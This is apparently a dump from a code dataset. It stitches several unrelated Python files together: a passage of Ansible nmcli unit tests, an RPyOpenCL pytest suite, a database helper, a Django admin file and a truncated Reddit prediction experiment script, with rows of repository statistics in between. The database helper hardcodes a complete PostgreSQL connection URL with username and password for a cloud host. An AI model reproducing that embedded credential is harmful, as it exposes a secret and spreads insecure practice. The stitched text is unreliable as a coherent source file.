get_available_options_args, get_available_options_kw = arg_list[0]
assert get_available_options_args[0][0] == '/usr/bin/nmcli'
assert get_available_options_args[0][1] == 'con'
assert get_available_options_args[0][2] == 'edit'
assert get_available_options_args[0][3] == 'type'
assert get_available_options_args[0][4] == 'wifi'
get_available_options_data = get_available_options_kw['data'].split()
for param in ['print', '802-11-wireless-security',
'quit', 'yes']:
assert param in get_available_options_data
show_args, show_kw = arg_list[1]
assert show_args[0][0] == '/usr/bin/nmcli'
assert show_args[0][1] == '--show-secrets'
assert show_args[0][2] == 'con'
assert show_args[0][3] == 'show'
assert show_args[0][4] == 'non_existent_nw_device'
add_args, add_kw = arg_list[2]
assert add_args[0][0] == '/usr/bin/nmcli'
assert add_args[0][1] == 'con'
assert add_args[0][2] == 'modify'
assert add_args[0][3] == 'non_existent_nw_device'
add_args_text = list(map(to_text, add_args[0]))
for param in ['connection.interface-name', 'wireless_non_existant',
'ipv4.addresses', '10.10.10.10/24',
'802-11-wireless.ssid', 'Brittany',
'802-11-wireless-security.key-mgmt', 'wpa-psk']:
assert param in add_args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert results.get('failed')
assert 'changed' not in results
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_DUMMY_STATIC, indirect=['patch_ansible_module'])
def test_create_dummy_static(mocked_generic_connection_create, capfd):
"""
Test : Create dummy connection with static IP configuration
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 2
arg_list = nmcli.Nmcli.execute_command.call_args_list
add_args, add_kw = arg_list[0]
assert add_args[0][0] == '/usr/bin/nmcli'
assert add_args[0][1] == 'con'
assert add_args[0][2] == 'add'
assert add_args[0][3] == 'type'
assert add_args[0][4] == 'dummy'
assert add_args[0][5] == 'con-name'
assert add_args[0][6] == 'non_existent_nw_device'
add_args_text = list(map(to_text, add_args[0]))
for param in ['connection.interface-name', 'dummy_non_existant',
'ipv4.addresses', '10.10.10.10/24',
'ipv4.gateway', '10.10.10.1',
'ipv4.dns', '1.1.1.1,8.8.8.8',
'ipv6.addresses', '2001:db8::1/128']:
assert param in add_args_text
up_args, up_kw = arg_list[1]
assert up_args[0][0] == '/usr/bin/nmcli'
assert up_args[0][1] == 'con'
assert up_args[0][2] == 'up'
assert up_args[0][3] == 'non_existent_nw_device'
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_DUMMY_STATIC, indirect=['patch_ansible_module'])
def test_dummy_connection_static_unchanged(mocked_dummy_connection_static_unchanged, capfd):
"""
Test : Dummy connection with static IP configuration unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_DUMMY_STATIC, indirect=['patch_ansible_module'])
def test_dummy_connection_static_without_mtu_unchanged(mocked_dummy_connection_static_without_mtu_unchanged, capfd):
"""
Test : Dummy connection with static IP configuration and no mtu set unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_DUMMY_STATIC, indirect=['patch_ansible_module'])
def test_dummy_connection_static_with_custom_mtu_modify(mocked_dummy_connection_static_with_custom_mtu_modify, capfd):
"""
Test : Dummy connection with static IP configuration and no mtu set modify
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 2
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[1]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['802-3-ethernet.mtu', '0']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GSM, indirect=['patch_ansible_module'])
def test_create_gsm(mocked_generic_connection_create, capfd):
"""
Test if gsm created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'gsm'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['connection.interface-name', 'gsm_non_existant',
'gsm.apn', 'internet.telekom',
'gsm.username', 't-mobile',
'gsm.password', 'tm',
'gsm.pin', '1234']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GSM, indirect=['patch_ansible_module'])
def test_gsm_mod(mocked_generic_connection_modify, capfd):
"""
Test if gsm modified
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['gsm.username', 't-mobile',
'gsm.password', 'tm']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GSM, indirect=['patch_ansible_module'])
def test_gsm_connection_unchanged(mocked_gsm_connection_unchanged, capfd):
"""
Test if gsm connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
| 33.40458 | 141 | 0.616461 | 10,180 | 83,144 | 4.795776 | 0.033792 | 0.026628 | 0.02884 | 0.034248 | 0.921735 | 0.895066 | 0.869667 | 0.834682 | 0.788882 | 0.778702 | 0 | 0.037943 | 0.257313 | 83,144 | 2,488 | 142 | 33.418006 | 0.75268 | 0.027603 | 0 | 0.742464 | 0 | 0.001058 | 0.361767 | 0.097953 | 0 | 0 | 0.000075 | 0 | 0.220518 | 1 | 0.047065 | false | 0.005288 | 0.002644 | 0 | 0.049709 | 0.003173 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c784fd03045a55169772c4616ac2379ad7bbb602 | 13,197 | py | Python | tests/test_preferred_vector_size.py | shazz/DistributedOpenCL | ddfac3ea1be84b13539e7ac07f3ef7811bbd81b6 | [
"MIT"
] | 1 | 2021-12-07T08:56:44.000Z | 2021-12-07T08:56:44.000Z | tests/test_preferred_vector_size.py | shazz/DistributedOpenCL | ddfac3ea1be84b13539e7ac07f3ef7811bbd81b6 | [
"MIT"
] | null | null | null | tests/test_preferred_vector_size.py | shazz/DistributedOpenCL | ddfac3ea1be84b13539e7ac07f3ef7811bbd81b6 | [
"MIT"
] | null | null | null | import pytest
import sys
import os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../node')))
from rpyopencl import RPyOpenCLCluster
import numpy as np
from unittest import TestCase
from rpyc.utils.server import OneShotServer
from rpyopencl_service import RPyOpenCLService
kernel_template = """
__kernel void sum_mul(
__global const float<VECSIZE> *a_g, __global const float<VECSIZE> *b_g,
__global float<VECSIZE> *res_add, __global float<VECSIZE> *res_mul)
{
int gid = get_global_id(0);
res_add[gid] = a_g[gid] + b_g[gid];
res_mul[gid] = a_g[gid] * b_g[gid];
}
"""
kernel_no_template = """
__kernel void sum_mul(
__global const float *a_g, __global const float *b_g,
__global float *res_add, __global float *res_mul)
{
int gid = get_global_id(0);
res_add[gid] = a_g[gid] + b_g[gid];
res_mul[gid] = a_g[gid] * b_g[gid];
}
"""
kernel_no_template_optimized = """
__kernel void sum_mul(
__global const float4 *a_g, __global const float4 *b_g,
__global float4 *res_add, __global float4 *res_mul)
{
int gid = get_global_id(0);
res_add[gid] = a_g[gid] + b_g[gid];
res_mul[gid] = a_g[gid] * b_g[gid];
}
"""
class CommonTest(TestCase):
def setUp(self):
RPYC_CFG = {"allow_all_attrs": True, "allow_pickle": True, "allow_public_attrs": True}
self.server = OneShotServer(RPyOpenCLService, port=18861, auto_register=False, protocol_config=RPYC_CFG)
self.server.logger.quiet = False
self.server._start_in_thread()
print("OneShotServer started!")
nodes = [ {"name": "pytest", "ip": "localhost"} ]
cluster = RPyOpenCLCluster(nodes, use_async=False)
self.node = cluster.get_node("pytest")
print("Opencl node ready!")
def tearDown(self):
self.server.close()
class TestNoUseWithoutTemplate(CommonTest):
@pytest.fixture(autouse=True)
def setup_opencl(self):
self.object_type = np.float32
self.size = 16
self.kernel_name = "sum_mul"
self.a_np = np.random.rand(self.size).astype(self.object_type)
self.b_np = np.random.rand(self.size).astype(self.object_type)
self.kernel = kernel_no_template
def test_preferred_vector_size(self):
self.node.create_context()
self.node.add_command_queue()
self.node.compile_kernel(self.kernel, use_prefered_vector_size=None)
self.node.create_input_buffer(self.a_np)
self.node.create_input_buffer(self.b_np)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
res_array = np.array(self.node.execute_kernel(self.kernel_name, (self.size,), True))
print("Difference:", res_array[0] - (self.a_np + self.b_np))
assert np.allclose(res_array[0], self.a_np + self.b_np)
assert np.allclose(res_array[1], self.a_np * self.b_np)
class TestNoUseWithTemplate(CommonTest):
@pytest.fixture(autouse=True)
def setup_opencl(self):
self.object_type = np.float32
self.size = 16
self.kernel_name = "sum_mul"
self.a_np = np.random.rand(self.size).astype(self.object_type)
self.b_np = np.random.rand(self.size).astype(self.object_type)
self.kernel = kernel_template
def test_preferred_vector_size(self):
self.node.create_context()
self.node.add_command_queue()
self.node.compile_kernel(self.kernel, use_prefered_vector_size=None)
self.node.create_input_buffer(self.a_np)
self.node.create_input_buffer(self.b_np)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
res_array = np.array(self.node.execute_kernel(self.kernel_name, (self.size,), True))
print("Difference:", res_array[0] - (self.a_np + self.b_np))
assert np.allclose(res_array[0], self.a_np + self.b_np)
assert np.allclose(res_array[1], self.a_np * self.b_np)
class TestNoUseWithoutTemplateNoDivisible(CommonTest):
@pytest.fixture(autouse=True)
def setup_opencl(self):
self.object_type = np.float32
self.size = 17
self.kernel_name = "sum_mul"
self.a_np = np.random.rand(self.size).astype(self.object_type)
self.b_np = np.random.rand(self.size).astype(self.object_type)
self.kernel = kernel_no_template
def test_preferred_vector_size(self):
self.node.create_context()
self.node.add_command_queue()
self.node.compile_kernel(self.kernel, use_prefered_vector_size=None)
self.node.create_input_buffer(self.a_np)
self.node.create_input_buffer(self.b_np)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
# with pytest.raises(RuntimeError):
res_array = np.array(self.node.execute_kernel(self.kernel_name, (self.size,), True))
print("Difference:", res_array[0] - (self.a_np + self.b_np))
assert np.allclose(res_array[0], self.a_np + self.b_np)
assert np.allclose(res_array[1], self.a_np * self.b_np)
class TestNoUseWithTemplateNoDivisible(CommonTest):
@pytest.fixture(autouse=True)
def setup_opencl(self):
self.object_type = np.float32
self.size = 17
self.kernel_name = "sum_mul"
self.a_np = np.random.rand(self.size).astype(self.object_type)
self.b_np = np.random.rand(self.size).astype(self.object_type)
self.kernel = kernel_template
def test_preferred_vector_size(self):
self.node.create_context()
self.node.add_command_queue()
self.node.compile_kernel(self.kernel, use_prefered_vector_size=None)
self.node.create_input_buffer(self.a_np)
self.node.create_input_buffer(self.b_np)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
# with pytest.raises(RuntimeError):
res_array = np.array(self.node.execute_kernel(self.kernel_name, (self.size,), True))
print("Difference:", res_array[0] - (self.a_np + self.b_np))
assert np.allclose(res_array[0], self.a_np + self.b_np)
assert np.allclose(res_array[1], self.a_np * self.b_np)
class TestUseWithTemplateNoDivisible(CommonTest):
@pytest.fixture(autouse=True)
def setup_opencl(self):
self.object_type = np.float32
self.size = 17
self.kernel_name = "sum_mul"
self.a_np = np.random.rand(self.size).astype(self.object_type)
self.b_np = np.random.rand(self.size).astype(self.object_type)
self.kernel = kernel_template
def test_preferred_vector_size(self):
self.node.create_context()
self.node.add_command_queue()
self.node.compile_kernel(self.kernel, use_prefered_vector_size="float")
self.node.create_input_buffer(self.a_np)
self.node.create_input_buffer(self.b_np)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
with pytest.raises(RuntimeError):
res_array = np.array(self.node.execute_kernel(self.kernel_name, (self.size,), True))
print("Difference:", res_array[0] - (self.a_np + self.b_np))
assert np.allclose(res_array[0], self.a_np + self.b_np)
assert np.allclose(res_array[1], self.a_np * self.b_np)
class TestUseWithoutTemplateNoDivisible(CommonTest):
@pytest.fixture(autouse=True)
def setup_opencl(self):
self.object_type = np.float32
self.size = 17
self.kernel_name = "sum_mul"
self.a_np = np.random.rand(self.size).astype(self.object_type)
self.b_np = np.random.rand(self.size).astype(self.object_type)
self.kernel = kernel_template
def test_preferred_vector_size(self):
self.node.create_context()
self.node.add_command_queue()
self.node.compile_kernel(self.kernel, use_prefered_vector_size="float")
self.node.create_input_buffer(self.a_np)
self.node.create_input_buffer(self.b_np)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
with pytest.raises(RuntimeError):
res_array = np.array(self.node.execute_kernel(self.kernel_name, (self.size,), True))
print("Difference:", res_array[0] - (self.a_np + self.b_np))
assert np.allclose(res_array[0], self.a_np + self.b_np)
assert np.allclose(res_array[1], self.a_np * self.b_np)
class TestUseOptimizedNoDivisible(CommonTest):
# WARNING!!!! This test will not pass even as the result is wrong! kernel conception issue!
# There is no easy way to spot this conception issue unless checking the kernel input type
@pytest.fixture(autouse=True)
def setup_opencl(self):
self.object_type = np.float32
self.size = 17
self.kernel_name = "sum_mul"
self.a_np = np.random.rand(self.size).astype(self.object_type)
self.b_np = np.random.rand(self.size).astype(self.object_type)
self.kernel = kernel_no_template_optimized
def test_preferred_vector_size(self):
self.node.create_context()
self.node.add_command_queue()
self.node.compile_kernel(self.kernel, use_prefered_vector_size="float")
self.node.create_input_buffer(self.a_np)
self.node.create_input_buffer(self.b_np)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
res_array = np.array(self.node.execute_kernel(self.kernel_name, (self.size // 4,), True))
print("Difference:", res_array[0] - (self.a_np + self.b_np))
assert not np.allclose(res_array[0], self.a_np + self.b_np)
assert not np.allclose(res_array[1], self.a_np * self.b_np)
class TestNoUseOptimized(CommonTest):
@pytest.fixture(autouse=True)
def setup_opencl_node_optimized(self):
self.object_type = np.float32
self.size = 16
self.kernel_name = "sum_mul"
self.a_np = np.random.rand(self.size).astype(self.object_type)
self.b_np = np.random.rand(self.size).astype(self.object_type)
self.kernel = kernel_no_template_optimized
def test_preferred_vector_size(self):
self.node.create_context()
self.node.add_command_queue()
self.node.compile_kernel(self.kernel, use_prefered_vector_size=None)
self.node.create_input_buffer(self.a_np)
self.node.create_input_buffer(self.b_np)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
res_array = np.array(self.node.execute_kernel(self.kernel_name, (self.size // 4,), True))
print("Difference:", res_array[0] - (self.a_np + self.b_np))
assert np.allclose(res_array[0], self.a_np + self.b_np)
assert np.allclose(res_array[1], self.a_np * self.b_np)
class TestNoUseOptimizedNoDivide(CommonTest):
# WARNING!!!! This test will not pass even as the result is wrong! kernel conception issue!
# There is no easy way to spot this conception issue unless checking the kernel input type
@pytest.fixture(autouse=True)
def setup_opencl(self):
self.object_type = np.float32
self.size = 17
self.kernel_name = "sum_mul"
self.a_np = np.random.rand(self.size).astype(self.object_type)
self.b_np = np.random.rand(self.size).astype(self.object_type)
self.kernel = kernel_no_template_optimized
def test_preferred_vector_size(self):
self.node.create_context()
self.node.add_command_queue()
self.node.compile_kernel(self.kernel, use_prefered_vector_size=None)
self.node.create_input_buffer(self.a_np)
self.node.create_input_buffer(self.b_np)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
res_array = np.array(self.node.execute_kernel(self.kernel_name, (self.size // 4,), True))
print("Difference:", res_array[0] - (self.a_np + self.b_np))
assert not np.allclose(res_array[0], self.a_np + self.b_np)
assert not np.allclose(res_array[1], self.a_np * self.b_np)
| 40.112462 | 112 | 0.695764 | 1,951 | 13,197 | 4.42491 | 0.075346 | 0.067647 | 0.051083 | 0.045871 | 0.882775 | 0.878605 | 0.875478 | 0.875478 | 0.861578 | 0.861578 | 0 | 0.007451 | 0.186406 | 13,197 | 328 | 113 | 40.234756 | 0.796591 | 0.032204 | 0 | 0.803279 | 0 | 0 | 0.084613 | 0 | 0 | 0 | 0 | 0 | 0.07377 | 1 | 0.081967 | false | 0 | 0.032787 | 0 | 0.155738 | 0.045082 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c7a8dcff3368f251cff547db9eefc9ea8bd93de0 | 252 | py | Python | lib/database.py | trianggadios/sisbar | cc4516e93010d28795113d8289c9908bdf1f397c | [
"MIT"
] | null | null | null | lib/database.py | trianggadios/sisbar | cc4516e93010d28795113d8289c9908bdf1f397c | [
"MIT"
] | null | null | null | lib/database.py | trianggadios/sisbar | cc4516e93010d28795113d8289c9908bdf1f397c | [
"MIT"
] | null | null | null | import psycopg2
def db_connect():
conn = psycopg2.connect('postgres://gvnatsrdmpuiei:71bebeda59e3ed2169f820951cdeb99f54ce2494994aa384c551154b60fb525f@ec2-52-0-114-209.compute-1.amazonaws.com:5432/d4qbnkep1ksgfa', sslmode='require')
return conn | 50.4 | 201 | 0.81746 | 26 | 252 | 7.884615 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.252137 | 0.071429 | 252 | 5 | 202 | 50.4 | 0.623932 | 0 | 0 | 0 | 0 | 0.25 | 0.624506 | 0.596838 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
c7dff1ab8a2772260d9e5137bf17e88405aab99f | 167 | py | Python | frequencia/vinculos/admin.py | andersonqueiroz/frequencia | 7dae9bb6115759edb8e8297565d0dd1b638ac94a | [
"MIT"
] | 1 | 2021-11-22T17:17:03.000Z | 2021-11-22T17:17:03.000Z | frequencia/vinculos/admin.py | andersonqueiroz/frequencia | 7dae9bb6115759edb8e8297565d0dd1b638ac94a | [
"MIT"
] | 11 | 2019-06-18T11:19:23.000Z | 2021-08-23T12:04:54.000Z | frequencia/vinculos/admin.py | andersonqueiroz/frequencia | 7dae9bb6115759edb8e8297565d0dd1b638ac94a | [
"MIT"
] | 2 | 2019-04-09T16:23:22.000Z | 2022-01-27T19:13:19.000Z | from django.contrib import admin
from .models import Setor, Coordenadoria, Vinculo
# Register your models here.
admin.site.register([Setor, Coordenadoria, Vinculo])
| 23.857143 | 52 | 0.796407 | 21 | 167 | 6.333333 | 0.619048 | 0.270677 | 0.37594 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.11976 | 167 | 6 | 53 | 27.833333 | 0.904762 | 0.155689 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c7e4a1f6d1992bd14a0bcdefc2813e98e73c25e6 | 39,038 | py | Python | news_popularity_prediction/entry_points/snow_2016_workshop/experiment_configurations.py | MKLab-ITI/news-popularity-prediction | 5f66982c659de017665116297bb4fd29ca13f835 | [
"Apache-2.0"
] | 33 | 2016-01-25T01:21:36.000Z | 2021-08-04T09:09:13.000Z | news_popularity_prediction/entry_points/snow_2016_workshop/experiment_configurations.py | twishmay/news-popularity-prediction | 5f66982c659de017665116297bb4fd29ca13f835 | [
"Apache-2.0"
] | 1 | 2018-03-06T16:30:08.000Z | 2018-03-06T16:30:08.000Z | news_popularity_prediction/entry_points/snow_2016_workshop/experiment_configurations.py | twishmay/news-popularity-prediction | 5f66982c659de017665116297bb4fd29ca13f835 | [
"Apache-2.0"
] | 15 | 2016-03-22T00:45:41.000Z | 2022-02-08T03:08:52.000Z | __author__ = 'Georgios Rizos (georgerizos@iti.gr)'
from news_popularity_prediction.learning.single_experiment import DiscussionModellingExperiment
def reddit_news_experiments(data_folder):
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = "mean"
DATA_FOLDER = data_folder + "/reddit"
FEATURE_OSN_NAME_LIST = ["reddit"]
TARGET_OSN_NAME = "reddit" # OSN targets.
OSN_NAME_FOCUS = "reddit" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users", "score_wilson", "controversiality_wilson"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = "median"
DATA_FOLDER = data_folder + "/reddit"
FEATURE_OSN_NAME_LIST = ["reddit"]
TARGET_OSN_NAME = "reddit" # OSN targets.
OSN_NAME_FOCUS = "reddit" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users", "score_wilson", "controversiality_wilson"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = "comments"
DATA_FOLDER = data_folder + "/reddit"
FEATURE_OSN_NAME_LIST = ["reddit"]
TARGET_OSN_NAME = "reddit" # OSN targets.
OSN_NAME_FOCUS = "reddit" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users", "score_wilson", "controversiality_wilson"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = "users"
DATA_FOLDER = data_folder + "/reddit"
FEATURE_OSN_NAME_LIST = ["reddit"]
TARGET_OSN_NAME = "reddit" # OSN targets.
OSN_NAME_FOCUS = "reddit" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users", "score_wilson", "controversiality_wilson"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = "comments_users"
DATA_FOLDER = data_folder + "/reddit"
FEATURE_OSN_NAME_LIST = ["reddit"]
TARGET_OSN_NAME = "reddit" # OSN targets.
OSN_NAME_FOCUS = "reddit" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users", "score_wilson", "controversiality_wilson"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = "simple graph"
DATA_FOLDER = data_folder + "/reddit"
FEATURE_OSN_NAME_LIST = ["reddit"]
TARGET_OSN_NAME = "reddit" # OSN targets.
OSN_NAME_FOCUS = "reddit" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users", "score_wilson", "controversiality_wilson"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = True
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = True
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
DATA_FOLDER = data_folder + "/reddit"
FEATURE_OSN_NAME_LIST = ["reddit"]
TARGET_OSN_NAME = "reddit" # OSN targets.
OSN_NAME_FOCUS = "reddit" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users", "score_wilson", "controversiality_wilson"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
